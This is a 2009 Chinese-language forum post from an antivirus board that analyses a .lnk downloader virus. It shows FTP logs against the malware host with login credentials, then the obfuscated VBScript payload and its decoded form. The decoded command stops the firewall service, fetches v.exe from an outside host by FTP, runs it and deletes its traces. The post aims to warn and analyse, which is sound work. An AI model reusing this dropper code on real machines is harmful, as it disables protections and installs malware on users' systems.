[討論] 最近似乎在流行lnk病毒......

看板AntiVirus (防毒)作者miamodo時間17年前 (2009/01/27 16:43)推噓1(1推 0噓 4→)

留言5則, 2人參與討論串1/1

最近似乎在流行lnk病毒打開幾個有些連上以後是空的-如(1) 有些則是內容很多-如(2) 這些lnk是下載者(測試了幾個其本身並不會破壞系統),但下載的東東則..... 它會再生下載者(vbs),再生...... (1) ftp> open www.g03z.com Connected to www.g03z.com. 220 Serv-U FTP Server v6.4 for WinSock ready... User (www.g03z.com:(none)): aa33 331 User name okay, need password. Password:bb33 230 User logged in, proceed. ftp> ls 200 PORT Command successful. 550 No files found. (2) ftp> open www.g03z.com Connected to www.g03z.com. 220 Serv-U FTP Server v6.4 for WinSock ready... User (www.g03z.com:(none)): 123 331 User name okay, need password. Password:123 230 User logged in, proceed. ftp> ls 200 PORT Command successful. 150 Opening ASCII mode data connection for /bin/ls. busdh busdh2.lnk hdisf hdisf3.lnk ksjge ksjge1.lnk msvba2.lnk msvbq oqjsh oqjsh5.lnk qianlai qianlai01.lnk...... 226-Maximum disk quota limited to 102400 kBytes Used disk quota 0 kBytes, available 102400 kBytes 226 Transfer complete. ftp: 297 bytes received in 0.01Seconds 29.70Kbytes/sec. 其中busdh的內容(即vbs檔的內容) crhc=array (1672,1742,1760,1775,1691,1756,1757,1691,1720,1691,1726,1773,1760,1756,1775, 1760,1738,1757,1765,1760,1758,1775,1699,1693,1746,1774,1758,1773,1764,1771, 1775,1705,1742,1763,1760,1767,1767,1693,1700,1691,1672,1669,1756,1757,1705, 1773,1776,1769,1691,1693,1758,1768,1759,1691,1706,1758,1691,1769,1760,1775, 1691,1774,1775,1770,1771,1691,1774,1763,1756,1773,1760,1759,1756,1758,1758, 1760,1774,1774,1697,1760,1758,1763,1770,1691,1770,1771,1760,1769,1691,1778, 1778,1778,1705,1780,1756,1763,1770,1770,1771,1764,1758,1775,1776,1773,1760, 1707,1705,1758,1770,1768,1721,1721,1775,1705,1775,1697,1760,1758,1763,1770, 1691,1708,1709,1710,1721,1721,1775,1705,1775,1697,1760,1758,1763,1770,1691, 1708,1709,1710,1721,1721,1775,1705,1775,1697,1760,1758,1763,1770,1691,1762, 1760,1775,1691,1777,1705,1760,1779,1760,1691,1726,1717,1751,1777,1705,1760, 1779,1760,1721,1721,1775,1705,1775,1697,1760,1758,1763,1770,1691,1757,1780, 1760,1721,1721,1775,1705,1775,1697,1761,1775,1771,1691,1704,1774,1717,1775, 1705,1775,1697,1759,1760,1767,1691,1775,1705,1775,1697,1758,1717,1751,1777, 1705,1760,1779,1760,1697,1759,1760,1767,1691,1696,1778,1764,1769,1759,1764, 1773,1696,1751,1757,1776,1774,1759,1763,1705,1777,1757,1774,1697,1759,1760, 1767,1691,1758,1717,1751,1777,1705,1760,1779,1760,1697,1774,1775,1756,1773, 1775,1691,1763,1775,1775,1771,1717,1706,1706,1778,1778,1778,1705,1775,1775, 1761,1761,1715,1715,1711,1705,1758,1770,1768,1706,1766,1764,1769,1762,1705, 1765,1771,1762,1693,1703,1707,1672,1669) for i=1 to UBound(crhc) runner=runner&chr(crhc(i)-1659) next Execute runner 轉一下上面的數字: Set ab = CreateObject("Wscript.Shell") ab.run "cmd /c net stop sharedaccess&echo open www.yahoopicture0.com>>t.t&echo 123>>t.t&echo 123>>t.t&echo get v.exe C:\v.exe>>t.t&echo bye>>t.t&ftp -s:t.t&del t.t&c:\v.exe&del %windir%\busdh.vbs&del c:\v.exe&start h ttp://www.ttff884.com/king.jpg",0 -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 59.112.7.187